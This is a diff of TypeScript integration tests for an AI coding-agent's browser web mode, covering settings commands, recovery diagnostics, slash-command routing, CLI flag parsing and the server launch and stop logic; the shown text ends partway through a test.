+  const turnEndIdx = phase2NonStatus.indexOf(turnEnd);
+  assert.ok(agentEndIdx < turnEndIdx, "agent_end should precede turn_end");
+
+  // -----------------------------------------------------------------------
+  // Summary assertion: the complete assembled pipeline is proven
+  // -----------------------------------------------------------------------
+  const allEventTypes = [
+    ...nonStatusEvents.map((e) => e.type),
+    ...phase2NonStatus.map((e) => e.type),
+  ];
+  const requiredTypes = [
+    "message_update",
+    "tool_execution_start",
+    "tool_execution_end",
+    "extension_ui_request",
+    "agent_end",
+    "turn_end",
+  ];
+  for (const required of requiredTypes) {
+    assert.ok(
+      allEventTypes.includes(required),
+      `complete pipeline must include ${required} (got: ${allEventTypes.join(", ")})`,
+    );
   }
 });
 
-test("assembled settings controls keep retry visibility and daily-use mutations authoritative", async () => {
+test("assembled settings controls keep retry visibility and daily-use mutations authoritative", async (t) => {
   const fixture = makeWorkspaceFixture();
   const sessionPath = createSessionFile(fixture.projectCwd, fixture.sessionsDir, "sess-settings", "Settings Session");
   const bridgeCommands: any[] = [];
@@ -694,92 +695,93 @@ test("assembled settings controls keep retry visibility and daily-use mutations
     authStorage: AuthStorage.inMemory({
       anthropic: { type: "api_key", key: "sk-test-assembled-settings" },
     } as any),
+    getEnvApiKey: () => undefined,
   });
 
-  try {
-    const bootResponse = await bootRoute.GET();
-    assert.equal(bootResponse.status, 200);
-    const bootPayload = (await bootResponse.json()) as any;
-    assert.equal(bootPayload.bridge.sessionState.autoRetryEnabled, false);
-    assert.equal(bootPayload.bridge.sessionState.retryInProgress, true);
-    assert.equal(bootPayload.bridge.sessionState.retryAttempt, 2);
-
-    const steeringResponse = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "set_steering_mode", mode: "one-at-a-time" }),
-      }),
-    );
-    assert.equal(steeringResponse.status, 200);
-    const steeringBody = (await steeringResponse.json()) as any;
-    assert.equal(steeringBody.success, true);
-
-    const followUpResponse = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "set_follow_up_mode", mode: "one-at-a-time" }),
-      }),
-    );
-    assert.equal(followUpResponse.status, 502);
-    const followUpBody = (await followUpResponse.json()) as any;
-    assert.equal(followUpBody.success, false);
-    assert.match(followUpBody.error, /follow-up mode rejected/i);
-
-    const autoCompactionResponse = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "set_auto_compaction", enabled: true }),
-      }),
-    );
-    assert.equal(autoCompactionResponse.status, 200);
-    const autoCompactionBody = (await autoCompactionResponse.json()) as any;
-    assert.equal(autoCompactionBody.success, true);
-
-    const autoRetryResponse = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "set_auto_retry", enabled: true }),
-      }),
-    );
-    assert.equal(autoRetryResponse.status, 200);
-    const autoRetryBody = (await autoRetryResponse.json()) as any;
-    assert.equal(autoRetryBody.success, true);
-
-    const abortRetryResponse = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "abort_retry" }),
-      }),
-    );
-    assert.equal(abortRetryResponse.status, 200);
-    const abortRetryBody = (await abortRetryResponse.json()) as any;
-    assert.equal(abortRetryBody.success, true);
-
-    await waitForMicrotasks();
-
-    const refreshedBootResponse = await bootRoute.GET();
-    assert.equal(refreshedBootResponse.status, 200);
-    const refreshedBootPayload = (await refreshedBootResponse.json()) as any;
-    assert.equal(refreshedBootPayload.bridge.sessionState.steeringMode, "one-at-a-time");
-    assert.equal(refreshedBootPayload.bridge.sessionState.followUpMode, "all");
-    assert.equal(refreshedBootPayload.bridge.sessionState.autoCompactionEnabled, true);
-    assert.equal(refreshedBootPayload.bridge.sessionState.autoRetryEnabled, true);
-    assert.equal(refreshedBootPayload.bridge.sessionState.retryInProgress, false);
-    assert.equal(refreshedBootPayload.bridge.sessionState.retryAttempt, 0);
-
-    assert.deepEqual(
-      bridgeCommands.filter((entry) => entry.type !== "get_state").map((entry) => entry.type),
-      ["set_steering_mode", "set_follow_up_mode", "set_auto_compaction", "set_auto_retry", "abort_retry"],
-      "settings parity must route through the live bridge instead of browser-local toggles",
-    );
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     onboarding.resetOnboardingServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  const bootResponse = await bootRoute.GET();
+  assert.equal(bootResponse.status, 200);
+  const bootPayload = (await bootResponse.json()) as any;
+  assert.equal(bootPayload.bridge.sessionState.autoRetryEnabled, false);
+  assert.equal(bootPayload.bridge.sessionState.retryInProgress, true);
+  assert.equal(bootPayload.bridge.sessionState.retryAttempt, 2);
+
+  const steeringResponse = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "set_steering_mode", mode: "one-at-a-time" }),
+    }),
+  );
+  assert.equal(steeringResponse.status, 200);
+  const steeringBody = (await steeringResponse.json()) as any;
+  assert.equal(steeringBody.success, true);
+
+  const followUpResponse = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "set_follow_up_mode", mode: "one-at-a-time" }),
+    }),
+  );
+  assert.equal(followUpResponse.status, 502);
+  const followUpBody = (await followUpResponse.json()) as any;
+  assert.equal(followUpBody.success, false);
+  assert.match(followUpBody.error, /follow-up mode rejected/i);
+
+  const autoCompactionResponse = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "set_auto_compaction", enabled: true }),
+    }),
+  );
+  assert.equal(autoCompactionResponse.status, 200);
+  const autoCompactionBody = (await autoCompactionResponse.json()) as any;
+  assert.equal(autoCompactionBody.success, true);
+
+  const autoRetryResponse = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "set_auto_retry", enabled: true }),
+    }),
+  );
+  assert.equal(autoRetryResponse.status, 200);
+  const autoRetryBody = (await autoRetryResponse.json()) as any;
+  assert.equal(autoRetryBody.success, true);
+
+  const abortRetryResponse = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "abort_retry" }),
+    }),
+  );
+  assert.equal(abortRetryResponse.status, 200);
+  const abortRetryBody = (await abortRetryResponse.json()) as any;
+  assert.equal(abortRetryBody.success, true);
+
+  await waitForMicrotasks();
+
+  const refreshedBootResponse = await bootRoute.GET();
+  assert.equal(refreshedBootResponse.status, 200);
+  const refreshedBootPayload = (await refreshedBootResponse.json()) as any;
+  assert.equal(refreshedBootPayload.bridge.sessionState.steeringMode, "one-at-a-time");
+  assert.equal(refreshedBootPayload.bridge.sessionState.followUpMode, "all");
+  assert.equal(refreshedBootPayload.bridge.sessionState.autoCompactionEnabled, true);
+  assert.equal(refreshedBootPayload.bridge.sessionState.autoRetryEnabled, true);
+  assert.equal(refreshedBootPayload.bridge.sessionState.retryInProgress, false);
+  assert.equal(refreshedBootPayload.bridge.sessionState.retryAttempt, 0);
+
+  assert.deepEqual(
+    bridgeCommands.filter((entry) => entry.type !== "get_state").map((entry) => entry.type),
+    ["set_steering_mode", "set_follow_up_mode", "set_auto_compaction", "set_auto_retry", "abort_retry"],
+    "settings parity must route through the live bridge instead of browser-local toggles",
+  );
 });
 
-test("assembled recovery route exposes actionable browser diagnostics without raw transcript leakage", async () => {
+test("assembled recovery route exposes actionable browser diagnostics without raw transcript leakage", async (t) => {
   const fixture = makeWorkspaceFixture();
   const sessionPath = createSessionFile(fixture.projectCwd, fixture.sessionsDir, "sess-recovery", "Recovery Session");
 
@@ -873,27 +875,27 @@ test("assembled recovery route exposes actionable browser diagnostics without ra
     }),
   });
 
-  try {
-    const response = await recoveryRoute.GET();
-    assert.equal(response.status, 200);
-    const payload = (await response.json()) as any;
-
-    assert.equal(payload.status, "ready");
-    assert.equal(payload.bridge.retry.inProgress, true);
-    assert.equal(payload.bridge.retry.attempt, 2);
-    assert.equal(payload.bridge.authRefresh.phase, "failed");
-    assert.ok(payload.actions.browser.some((action: { id: string }) => action.id === "refresh_diagnostics"));
-    assert.ok(payload.actions.browser.some((action: { id: string }) => action.id === "open_retry_controls"));
-    assert.ok(payload.actions.browser.some((action: { id: string }) => action.id === "open_auth_controls"));
-    assert.equal(payload.interruptedRun.detected, true);
-    assert.doesNotMatch(JSON.stringify(payload), /sk-assembled-recovery-secret-0001|sk-assembled-auth-secret-0002/);
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  const response = await recoveryRoute.GET();
+  assert.equal(response.status, 200);
+  const payload = (await response.json()) as any;
+
+  assert.equal(payload.status, "ready");
+  assert.equal(payload.bridge.retry.inProgress, true);
+  assert.equal(payload.bridge.retry.attempt, 2);
+  assert.equal(payload.bridge.authRefresh.phase, "failed");
+  assert.ok(payload.actions.browser.some((action: { id: string }) => action.id === "refresh_diagnostics"));
+  assert.ok(payload.actions.browser.some((action: { id: string }) => action.id === "open_retry_controls"));
+  assert.ok(payload.actions.browser.some((action: { id: string }) => action.id === "open_auth_controls"));
+  assert.equal(payload.interruptedRun.detected, true);
+  assert.doesNotMatch(JSON.stringify(payload), /sk-assembled-recovery-secret-0001|sk-assembled-auth-secret-0002/);
 });
 
-test("assembled slash-command behavior keeps built-ins safe while preserving GSD prompt commands", async () => {
+test("assembled slash-command behavior keeps built-ins safe while preserving GSD prompt commands", async (t) => {
   const fixture = makeWorkspaceFixture();
   const sessionPath = createSessionFile(fixture.projectCwd, fixture.sessionsDir, "sess-slash", "Slash Session");
   const bridgeCommands: any[] = [];
@@ -964,79 +966,80 @@ test("assembled slash-command behavior keeps built-ins safe while preserving GSD
     authStorage: AuthStorage.inMemory({
       anthropic: { type: "api_key", key: "sk-test-assembled-slash" },
     } as any),
+    getEnvApiKey: () => undefined,
   });
 
-  try {
-    async function submitBrowserInput(input: string): Promise<{ outcome: any; status: number | null; body: any; notice: string | null }> {
-      const outcome = dispatchBrowserSlashCommand(input);
-
-      if (outcome.kind === "prompt" || outcome.kind === "rpc") {
-        const response = await commandRoute.POST(
-          new Request("http://localhost/api/session/command", {
-            method: "POST",
-            body: JSON.stringify(outcome.command),
-          }),
-        );
-        return {
-          outcome,
-          status: response.status,
-          body: await response.json(),
-          notice: null,
-        };
-      }
-
-      const notice = getBrowserSlashCommandTerminalNotice(outcome)?.message ?? null;
-      return {
-        outcome,
-        status: null,
-        body: null,
-        notice,
-      };
-    }
-
-    const builtInExecution = await submitBrowserInput("/new");
-    assert.equal(builtInExecution.outcome.kind, "rpc");
-    assert.equal(builtInExecution.status, 200);
-    assert.equal(builtInExecution.body.command, "new_session");
-
-    const builtInSurface = await submitBrowserInput("/model");
-    assert.equal(builtInSurface.outcome.kind, "surface");
-    assert.equal(builtInSurface.outcome.surface, "model");
-    assert.equal(builtInSurface.status, null);
-
-    const builtInNameSurface = await submitBrowserInput("/name Ship It");
-    assert.equal(builtInNameSurface.outcome.kind, "surface");
-    assert.equal(builtInNameSurface.outcome.surface, "name");
-    assert.equal(builtInNameSurface.status, null);
-
-    const builtInReject = await submitBrowserInput("/share");
-    assert.equal(builtInReject.outcome.kind, "reject");
-    assert.match(builtInReject.notice ?? "", /blocked instead of falling through to the model/i);
-    assert.equal(builtInReject.status, null);
-
-    // /gsd status is now a browser surface (S02), verify that
-    const gsdSurface = await submitBrowserInput("/gsd status");
-    assert.equal(gsdSurface.outcome.kind, "surface");
-    assert.equal(gsdSurface.outcome.surface, "gsd-status");
-    assert.equal(gsdSurface.status, null);
-
-    // /gsd auto is a passthrough subcommand — reaches the bridge as a prompt
-    const gsdPrompt = await submitBrowserInput("/gsd auto");
-    assert.equal(gsdPrompt.outcome.kind, "prompt");
-    assert.equal(gsdPrompt.status, 200);
-    assert.equal(gsdPrompt.body.command, "prompt");
-
-    const sentTypes = bridgeCommands.map((command) => command.type);
-    assert.deepEqual(
-      sentTypes.filter((type) => type !== "get_state"),
-      ["new_session", "prompt"],
-      "only browser-executable slash commands should reach the live bridge; built-in surfaces/rejects must stay out of prompt text",
-    );
-    const promptCommand = bridgeCommands.find((command) => command.type === "prompt");
-    assert.equal(promptCommand?.message, "/gsd auto", "GSD passthrough commands must stay on the extension prompt path");
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     onboarding.resetOnboardingServiceForTests();
     fixture.cleanup();
+  });
+
+  async function submitBrowserInput(input: string): Promise<{ outcome: any; status: number | null; body: any; notice: string | null }> {
+    const outcome = dispatchBrowserSlashCommand(input);
+
+    if (outcome.kind === "prompt" || outcome.kind === "rpc") {
+      const response = await commandRoute.POST(
+        new Request("http://localhost/api/session/command", {
+          method: "POST",
+          body: JSON.stringify(outcome.command),
+        }),
+      );
+      return {
+        outcome,
+        status: response.status,
+        body: await response.json(),
+        notice: null,
+      };
+    }
+
+    const notice = getBrowserSlashCommandTerminalNotice(outcome)?.message ?? null;
+    return {
+      outcome,
+      status: null,
+      body: null,
+      notice,
+    };
   }
+
+  const builtInExecution = await submitBrowserInput("/new");
+  assert.equal(builtInExecution.outcome.kind, "rpc");
+  assert.equal(builtInExecution.status, 200);
+  assert.equal(builtInExecution.body.command, "new_session");
+
+  const builtInSurface = await submitBrowserInput("/model");
+  assert.equal(builtInSurface.outcome.kind, "surface");
+  assert.equal(builtInSurface.outcome.surface, "model");
+  assert.equal(builtInSurface.status, null);
+
+  const builtInNameSurface = await submitBrowserInput("/name Ship It");
+  assert.equal(builtInNameSurface.outcome.kind, "surface");
+  assert.equal(builtInNameSurface.outcome.surface, "name");
+  assert.equal(builtInNameSurface.status, null);
+
+  const builtInReject = await submitBrowserInput("/share");
+  assert.equal(builtInReject.outcome.kind, "reject");
+  assert.match(builtInReject.notice ?? "", /blocked instead of falling through to the model/i);
+  assert.equal(builtInReject.status, null);
+
+  // /gsd status is now a browser surface (S02), verify that
+  const gsdSurface = await submitBrowserInput("/gsd status");
+  assert.equal(gsdSurface.outcome.kind, "surface");
+  assert.equal(gsdSurface.outcome.surface, "gsd-status");
+  assert.equal(gsdSurface.status, null);
+
+  // /gsd auto is a passthrough subcommand — reaches the bridge as a prompt
+  const gsdPrompt = await submitBrowserInput("/gsd auto");
+  assert.equal(gsdPrompt.outcome.kind, "prompt");
+  assert.equal(gsdPrompt.status, 200);
+  assert.equal(gsdPrompt.body.command, "prompt");
+
+  const sentTypes = bridgeCommands.map((command) => command.type);
+  assert.deepEqual(
+    sentTypes.filter((type) => type !== "get_state"),
+    ["new_session", "prompt"],
+    "only browser-executable slash commands should reach the live bridge; built-in surfaces/rejects must stay out of prompt text",
+  );
+  const promptCommand = bridgeCommands.find((command) => command.type === "prompt");
+  assert.equal(promptCommand?.message, "/gsd auto", "GSD passthrough commands must stay on the extension prompt path");
 });
diff --git a/src/tests/integration/web-mode-cli.test.ts b/src/tests/integration/web-mode-cli.test.ts
new file mode 100644
index 000000000..68b6c9c1b
--- /dev/null
+++ b/src/tests/integration/web-mode-cli.test.ts
@@ -0,0 +1,747 @@
+import test from 'node:test'
+import assert from 'node:assert/strict'
+import { mkdirSync, mkdtempSync, readFileSync, rmSync, writeFileSync } from 'node:fs'
+import { join, resolve } from 'node:path'
+import { tmpdir } from 'node:os'
+
+const projectRoot = process.cwd()
+
+const cliWeb = await import('../../cli-web-branch.ts')
+const webMode = await import('../../web-mode.ts')
+
+test('parseCliArgs recognizes --web explicitly', () => {
+  const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', '--web'])
+  assert.equal(flags.web, true)
+  assert.equal(flags.print, undefined)
+  assert.equal(flags.mode, undefined)
+})
+
+test('package hooks declare a concrete staged web host', () => {
+  const rootPackage = JSON.parse(readFileSync(join(projectRoot, 'package.json'), 'utf-8'))
+  assert.equal(rootPackage.scripts['stage:web-host'], 'node scripts/stage-web-standalone.cjs')
+  assert.equal(rootPackage.scripts['build:web-host'], 'npm --prefix web run build && npm run stage:web-host')
+  assert.equal(rootPackage.scripts['gsd'], 'node scripts/dev-cli.js')
+  assert.equal(rootPackage.scripts['gsd:web'], 'npm run build:pi && npm run copy-resources && node scripts/build-web-if-stale.cjs && node scripts/dev-cli.js --web')
+  assert.equal(rootPackage.scripts['gsd:web:stop'], 'node scripts/dev-cli.js web stop')
+  assert.ok(rootPackage.files.includes('dist/web'))
+
+  const webPackage = JSON.parse(readFileSync(join(projectRoot, 'web', 'package.json'), 'utf-8'))
+  assert.equal(webPackage.scripts['start:standalone'], 'node .next/standalone/web/server.js')
+})
+
+test('web mode launcher defines or imports a browser opener', () => {
+  const source = readFileSync(join(projectRoot, 'src', 'web-mode.ts'), 'utf-8')
+  // openBrowser is now defined directly in web-mode.ts (was previously imported from onboarding.js)
+  assert.match(source, /openBrowser/)
+})
+
+test('cli.ts branches to web mode before interactive startup and preserves cwd-scoped launch inputs', async (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-cli-'))
+  const cwd = join(tmp, 'project space')
+  mkdirSync(cwd, { recursive: true })
+
+  let launchInputs: { cwd: string; projectSessionsDir: string; agentDir: string } | undefined
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  const cliSource = readFileSync(join(projectRoot, 'src', 'cli.ts'), 'utf-8')
+  const branchIndex = cliSource.indexOf('const webBranch = await runWebCliBranch')
+  const modelRegistryIndex = cliSource.indexOf('const modelRegistry =')
+  assert.ok(branchIndex !== -1, 'cli.ts contains an explicit web branch handoff')
+  assert.ok(modelRegistryIndex !== -1, 'cli.ts still contains the model-registry startup path')
+  assert.ok(branchIndex < modelRegistryIndex, 'web branch runs before interactive startup state is constructed')
+
+  const result = await cliWeb.runWebCliBranch(cliWeb.parseCliArgs(['node', 'dist/loader.js', '--web']), {
+    cwd: () => cwd,
+    runWebMode: async (options) => {
+      launchInputs = options
+      return {
+        mode: 'web',
+        ok: true,
+        cwd: options.cwd,
+        projectSessionsDir: options.projectSessionsDir,
+        host: '127.0.0.1',
+        port: 43123,
+        url: 'http://127.0.0.1:43123',
+        hostKind: 'source-dev',
+        hostPath: '/tmp/fake-web/package.json',
+        hostRoot: '/tmp/fake-web',
+      }
+    },
+  })
+
+  assert.equal(result.handled, true)
+  if (!result.handled) throw new Error('expected --web branch to be handled')
+  assert.equal(result.exitCode, 0)
+  assert.deepEqual(launchInputs, {
+    cwd,
+    projectSessionsDir: cliWeb.getProjectSessionsDir(cwd),
+    agentDir: join(process.env.HOME || '', '.gsd', 'agent'),
+    host: undefined,
+    port: undefined,
+    allowedOrigins: undefined,
+  })
+})
+
+test('launchWebMode prefers the packaged standalone host and opens the resolved URL', async (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-host-'))
+  const standaloneRoot = join(tmp, 'dist', 'web', 'standalone')
+  const serverPath = join(standaloneRoot, 'server.js')
+  mkdirSync(standaloneRoot, { recursive: true })
+  writeFileSync(serverPath, 'console.log("stub")\n')
+
+  let initResourcesCalled = false
+  let unrefCalled = false
+  let openedUrl = ''
+  let stderrOutput = ''
+  let spawnInvocation:
+    | { command: string; args: readonly string[]; options: Record<string, any> }
+    | undefined
+  let writtenPid: { path: string; pid: number } | undefined
+
+  const pidFilePath = join(tmp, 'web-server.pid')
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  const status = await webMode.launchWebMode(
+    {
+      cwd: '/tmp/current-project',
+      projectSessionsDir: '/tmp/.gsd/sessions/--tmp-current-project--',
+      agentDir: '/tmp/.gsd/agent',
+      packageRoot: tmp,
+    },
+    {
+      initResources: () => {
+        initResourcesCalled = true
+      },
+      resolvePort: async () => 45123,
+      execPath: '/custom/node',
+      env: { TEST_ENV: '1' },
+      spawn: (command, args, options) => {
+        spawnInvocation = { command, args, options: options as Record<string, any> }
+        return {
+          pid: 99999,
+          once: () => undefined,
+          unref: () => {
+            unrefCalled = true
+          },
+        } as any
+      },
+      waitForBootReady: async () => undefined,
+      openBrowser: (url) => {
+        openedUrl = url
+      },
+      pidFilePath,
+      writePidFile: (path, pid) => {
+        writtenPid = { path, pid }
+        webMode.writePidFile(path, pid)
+      },
+      stderr: {
+        write(chunk: string) {
+          stderrOutput += chunk
+          return true
+        },
+      },
+    },
+  )
+
+  assert.equal(status.ok, true)
+  if (!status.ok) throw new Error('expected successful web launch status')
+  assert.equal(status.hostKind, 'packaged-standalone')
+  assert.equal(status.hostPath, serverPath)
+  assert.equal(status.url, 'http://127.0.0.1:45123')
+  assert.equal(initResourcesCalled, true)
+  assert.equal(unrefCalled, true)
+  // The browser URL now includes a random auth token as a fragment
+  assert.match(openedUrl, /^http:\/\/127\.0\.0\.1:45123\/#token=[a-f0-9]{64}$/)
+  // Extract the auth token the launcher generated so we can verify it was
+  // passed consistently to both the env and the browser URL.
+  const authToken = openedUrl.replace('http://127.0.0.1:45123/#token=', '')
+  assert.deepEqual(spawnInvocation, {
+    command: '/custom/node',
+    args: [serverPath],
+    options: {
+      cwd: standaloneRoot,
+      detached: true,
+      stdio: 'ignore',
+      windowsHide: true,
+      env: {
+        TEST_ENV: '1',
+        HOSTNAME: '127.0.0.1',
+        PORT: '45123',
+        GSD_WEB_HOST: '127.0.0.1',
+        GSD_WEB_PORT: '45123',
+        GSD_WEB_AUTH_TOKEN: authToken,
+        GSD_WEB_PROJECT_CWD: '/tmp/current-project',
+        GSD_WEB_PROJECT_SESSIONS_DIR: '/tmp/.gsd/sessions/--tmp-current-project--',
+        GSD_WEB_PACKAGE_ROOT: tmp,
+        GSD_WEB_HOST_KIND: 'packaged-standalone',
+      },
+    },
+  })
+  assert.match(stderrOutput, /status=started/)
+  assert.match(stderrOutput, /port=45123/)
+  // PID file must be written with the spawned process's PID
+  assert.deepEqual(writtenPid, { path: pidFilePath, pid: 99999 })
+  assert.equal(webMode.readPidFile(pidFilePath), 99999)
+})
+
+test('stopWebMode kills process by PID and removes PID file', (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-stop-'))
+  const pidFilePath = join(tmp, 'web-server.pid')
+  let stderrOutput = ''
+  let killedPid: number | undefined
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  webMode.writePidFile(pidFilePath, 12345)
+
+  const result = webMode.stopWebMode({
+    pidFilePath,
+    readPidFile: webMode.readPidFile,
+    deletePidFile: webMode.deletePidFile,
+    stderr: { write: (chunk: string) => { stderrOutput += chunk; return true } },
+    // Override process.kill to avoid killing a real process in tests
+  })
+
+  // Since PID 12345 is almost certainly dead, stopWebMode should succeed by treating ESRCH as "already gone"
+  assert.equal(result.ok, true)
+  assert.match(stderrOutput, /pid=12345/)
+})
+
+test('stopWebMode reports error when no PID file exists', (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-stop-nopid-'))
+  const pidFilePath = join(tmp, 'web-server.pid')
+  let stderrOutput = ''
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  const result = webMode.stopWebMode({
+    pidFilePath,
+    readPidFile: webMode.readPidFile,
+    deletePidFile: webMode.deletePidFile,
+    stderr: { write: (chunk: string) => { stderrOutput += chunk; return true } },
+  })
+
+  assert.equal(result.ok, false)
+  assert.equal(result.reason, 'no-pid-file')
+  assert.match(stderrOutput, /not running/)
+})
+
+test('runWebCliBranch handles "web stop" subcommand without --web flag', async (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-branch-stop-'))
+  const pidFilePath = join(tmp, 'web-server.pid')
+  let stderrOutput = ''
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', 'web', 'stop'])
+  assert.equal(flags.web, undefined)
+  assert.deepEqual(flags.messages, ['web', 'stop'])
+
+  const result = await cliWeb.runWebCliBranch(flags, {
+    stopWebMode: (deps) => {
+      return webMode.stopWebMode({ ...deps, pidFilePath })
+    },
+    stderr: { write: (chunk: string) => { stderrOutput += chunk; return true } },
+  })
+
+  assert.equal(result.handled, true)
+  if (!result.handled) throw new Error('expected web stop to be handled')
+  assert.equal(result.exitCode, 1) // no PID file — expected failure
+  if (result.action !== 'stop') throw new Error('expected action=stop')
+  assert.equal(result.stopResult.ok, false)
+})
+
+// ─── Path argument tests ──────────────────────────────────────────────
+
+test('parseCliArgs captures --web <path>', () => {
+  const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', '--web', '/tmp/my-project'])
+  assert.equal(flags.web, true)
+  assert.equal(flags.webPath, '/tmp/my-project')
+  assert.deepEqual(flags.messages, [])
+})
+
+test('parseCliArgs captures --web with relative path', () => {
+  const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', '--web', '../other-project'])
+  assert.equal(flags.web, true)
+  assert.equal(flags.webPath, '../other-project')
+})
+
+test('parseCliArgs does not capture --web followed by a flag as path', () => {
+  const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', '--web', '--model', 'test'])
+  assert.equal(flags.web, true)
+  assert.equal(flags.webPath, undefined)
+  assert.equal(flags.model, 'test')
+})
+
+test('gsd web <path> is handled as web start with path', async (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-path-'))
+  const projectDir = join(tmp, 'my-project')
+  mkdirSync(projectDir, { recursive: true })
+  let launchedCwd = ''
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', 'web', projectDir])
+  assert.deepEqual(flags.messages, ['web', projectDir])
+
+  const result = await cliWeb.runWebCliBranch(flags, {
+    runWebMode: async (options) => {
+      launchedCwd = options.cwd
+      return {
+        mode: 'web',
+        ok: true,
+        cwd: options.cwd,
+        projectSessionsDir: options.projectSessionsDir,
+        host: '127.0.0.1',
+        port: 43124,
+        url: 'http://127.0.0.1:43124',
+        hostKind: 'source-dev',
+        hostPath: '/tmp/fake-web/package.json',
+        hostRoot: '/tmp/fake-web',
+      }
+    },
+  })
+
+  assert.equal(result.handled, true)
+  if (!result.handled) throw new Error('expected web branch to be handled')
+  assert.equal(result.exitCode, 0)
+  assert.equal(launchedCwd, projectDir)
+})
+
+test('gsd web start <path> resolves path and launches', async (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-start-path-'))
+  const projectDir = join(tmp, 'another-project')
+  mkdirSync(projectDir, { recursive: true })
+  let launchedCwd = ''
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', 'web', 'start', projectDir])
+  assert.deepEqual(flags.messages, ['web', 'start', projectDir])
+
+  const result = await cliWeb.runWebCliBranch(flags, {
+    runWebMode: async (options) => {
+      launchedCwd = options.cwd
+      return {
+        mode: 'web',
+        ok: true,
+        cwd: options.cwd,
+        projectSessionsDir: options.projectSessionsDir,
+        host: '127.0.0.1',
+        port: 43125,
+        url: 'http://127.0.0.1:43125',
+        hostKind: 'source-dev',
+        hostPath: '/tmp/fake-web/package.json',
+        hostRoot: '/tmp/fake-web',
+      }
+    },
+  })
+
+  assert.equal(result.handled, true)
+  if (!result.handled) throw new Error('expected web branch to be handled')
+  assert.equal(result.exitCode, 0)
+  assert.equal(launchedCwd, projectDir)
+})
+
+test('gsd --web <path> resolves path and launches', async (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-flag-path-'))
+  const projectDir = join(tmp, 'flagged-project')
+  mkdirSync(projectDir, { recursive: true })
+  let launchedCwd = ''
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', '--web', projectDir])
+  assert.equal(flags.web, true)
+  assert.equal(flags.webPath, projectDir)
+
+  const result = await cliWeb.runWebCliBranch(flags, {
+    runWebMode: async (options) => {
+      launchedCwd = options.cwd
+      return {
+        mode: 'web',
+        ok: true,
+        cwd: options.cwd,
+        projectSessionsDir: options.projectSessionsDir,
+        host: '127.0.0.1',
+        port: 43126,
+        url: 'http://127.0.0.1:43126',
+        hostKind: 'source-dev',
+        hostPath: '/tmp/fake-web/package.json',
+        hostRoot: '/tmp/fake-web',
+      }
+    },
+  })
+
+  assert.equal(result.handled, true)
+  if (!result.handled) throw new Error('expected web branch to be handled')
+  assert.equal(result.exitCode, 0)
+  assert.equal(launchedCwd, projectDir)
+})
+
+test('gsd --web <nonexistent-path> fails with clear error', async () => {
+  let stderrOutput = ''
+
+  const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', '--web', '/tmp/nonexistent-gsd-test-path-xyz'])
+  const result = await cliWeb.runWebCliBranch(flags, {
+    stderr: { write: (chunk: string) => { stderrOutput += chunk; return true } },
+  })
+
+  assert.equal(result.handled, true)
+  if (!result.handled) throw new Error('expected web branch to be handled')
+  assert.equal(result.exitCode, 1)
+  if (result.action !== 'start') throw new Error('expected action=start')
+  assert.equal(result.status.ok, false)
+  if (result.status.ok) throw new Error('expected failed status')
+  assert.match(result.status.failureReason, /does not exist/)
+  assert.match(stderrOutput, /does not exist/)
+})
+
+test('launch failure surfaces status and reason before browser open', async (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-missing-host-'))
+  let openedUrl = ''
+  let stderrOutput = ''
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  const status = await webMode.launchWebMode(
+    {
+      cwd: '/tmp/current-project',
+      projectSessionsDir: '/tmp/.gsd/sessions/--tmp-current-project--',
+      agentDir: '/tmp/.gsd/agent',
+      packageRoot: tmp,
+    },
+    {
+      openBrowser: (url) => {
+        openedUrl = url
+      },
+      stderr: {
+        write(chunk: string) {
+          stderrOutput += chunk
+          return true
+        },
